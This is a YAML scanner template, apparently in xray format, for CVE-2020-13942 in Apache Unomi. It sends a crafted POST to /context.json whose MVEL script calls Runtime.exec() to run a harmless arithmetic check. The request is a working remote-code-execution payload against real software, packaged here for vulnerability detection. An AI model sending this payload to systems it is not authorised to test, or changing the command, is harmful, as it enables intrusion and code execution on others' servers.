unomi-rce-cve-2020-13942.yml

name: poc-yaml-unomi-rce-cve-2020-13942
transport: http
set:
    f1: randomInt(800000000, 900000000)
    f2: randomInt(800000000, 900000000)
    id: randomLowercase(20)
    session: randomLowercase(20)
rules:
    r1:
        request:
            method: POST
            path: "/context.json"
            headers:
                Content-Type: application/json
            body: |-
                {
                    "filters": [
                        {
                            "id": "{{id}}",
                            "filters": [
                                {
                                    "condition": {
                                         "parameterValues": {
                                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"expr {{f1}}+{{f2}}\");"
                                        },
                                        "type": "profilePropertyCondition"
                                    }
                                }
                            ]
                        }
                    ],
                    "sessionId": "{{session}}"
                }
        expression: response.status == 200 && response.body.bcontains(bytes(string(id))) && response.body.bcontains(bytes(string(session)))
expression: r1()
detail:
    author: 曦shen
    links:
        - https://github.com/vulhub/vulhub/blob/master/unomi/CVE-2020-13942/README.zh-cn.md